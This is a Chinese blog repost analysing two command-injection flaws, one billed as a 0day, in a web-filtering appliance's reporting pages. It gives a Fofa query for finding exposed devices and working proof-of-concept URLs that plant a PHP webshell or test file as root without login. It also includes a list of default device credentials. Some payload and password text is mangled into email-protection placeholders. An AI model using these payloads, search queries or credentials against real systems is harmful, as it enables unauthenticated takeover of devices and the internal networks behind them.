某安全设备rce漏洞分析(0day和nday)

admin 2022年8月24日20:42:04安全文章评论25 views1716字阅读5分43秒阅读模式

 一日偶然情况拿到一套某设备源码,设备大概长这个样子:

某安全设备rce漏洞分析(0day和nday)

以下打码*内容自动脑补!!

通过对源码分析一共开放三个端口如下:

某安全设备rce漏洞分析(0day和nday)

某安全设备rce漏洞分析(0day和nday)

某安全设备rce漏洞分析(0day和nday)


对不同端口进行代码分析获得如下漏洞。


漏洞分析一:(0day)9091端口


 从Nday0day的一个故事(也不算0day),首先来源是华域Reporter命令注入漏洞分析的文章,发现是因为华域Reporter使用了一个组件导致的漏洞,该组件的设备较多,多用于上网行为管理设备的报表系统,正好这个天某信上网行为管理系统也有。

该漏洞利用难度低,影响范围较广,无需登录可直接以root权限执行任意命令,从而控制该设备,进而控制内网其它服务器和终端设备,该设备一旦被控制,可能会影响到整个内网。

Fofa:

title=="Login @ Reporter" && body="xx信"app="xx信-上网行为管理系统" && title=="Login @ Reporter"


漏洞分析

路径:/www/reporter/view/Behavior/toQuery.php

 

某安全设备rce漏洞分析(0day和nday)


通过代码可以看出

if ($_GET ["method"] == "getList" || $_GET ["method"] == "import") {


method=getList进入if分支并且objclass只要不为空就可以


某安全设备rce漏洞分析(0day和nday)

看到使用了exec函数$cmd可以通过objClass控制


某安全设备rce漏洞分析(0day和nday)


控制值

objClass=%0aecho%20%27%3C?php%[email protected]($_POST[%22x%22]);%20?%3E%27%3E/var/www/reporter/view/Behavior/shell.php%0a



上传成功

 

某安全设备rce漏洞分析(0day和nday)

POC

/view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%27%3C?php%[email protected]($_POST[%22x%22]);%20?%3E%27%3E/var/www/reporter/view/Behavior/shell.php%0a



路径:

http://ip/view/Behavior/shell.php



漏洞分析二某上网行为管理系统RCE(nday)8080端口


POC

前两天某行动看到一个poc如下

view/IPV6/naborTable/static_convert.php?blocks[0]=||%20 echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a

Base64

/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20 echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a

漏洞分析

对代码进行搜索

 

某安全设备rce漏洞分析(0day和nday)


找到相关文件进行分析

 

某安全设备rce漏洞分析(0day和nday)

通过代码可以看出

foreach($_REQUEST["blocks"] as $key => $info)  {      $cmd = "ip -6 neigh del ".$info;


通过变量覆盖控制blocks赋给key值进行命令执行

控制值:

blocks[0]=||%20 echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a


进行上传。



附:某设备密码字典

test/123456superman / talentsuperman  telent用户名:superman 密码:talent用户名:superman 密码:talent123用户名:superman 密码:[email protected]用户名:superman 密码:[email protected]


此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!

此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!

此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!


原文始发于微信公众号(河北网络安全高校联盟):某安全设备rce漏洞分析(0day和nday)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月24日20:42:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  某安全设备rce漏洞分析(0day和nday) http://cn-sec.com/archives/1252356.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: